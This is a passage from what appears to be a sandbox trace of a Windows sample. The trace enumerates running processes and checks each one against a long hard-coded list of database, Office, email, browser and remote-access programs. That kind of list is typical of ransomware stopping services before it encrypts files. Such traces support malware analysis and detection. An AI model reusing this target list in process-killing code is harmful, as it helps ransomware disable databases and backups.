sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.827] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0112.829] lstrcmpiW (lpString1="scriptftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.829] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0112.832] lstrcmpiW (lpString1="skype.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.832] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0112.834] lstrcmpiW (lpString1="smartftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.834] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0112.836] lstrcmpiW (lpString1="thunderbird.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.836] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0112.838] lstrcmpiW (lpString1="totalcmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.838] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0112.839] lstrcmpiW (lpString1="trillian.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.840] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0112.841] lstrcmpiW (lpString1="webdrive.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.841] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0112.842] lstrcmpiW (lpString1="whatsapp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.842] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0112.844] lstrcmpiW (lpString1="winscp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.844] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0112.845] lstrcmpiW (lpString1="yahoomessenger.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.845] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0112.846] lstrcmpiW (lpString1="active-charge.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.847] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0112.848] lstrcmpiW (lpString1="accupos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.848] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0112.849] lstrcmpiW (lpString1="afr38.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.849] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0112.851] lstrcmpiW (lpString1="aldelo.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.851] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0112.852] lstrcmpiW (lpString1="ccv_server.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 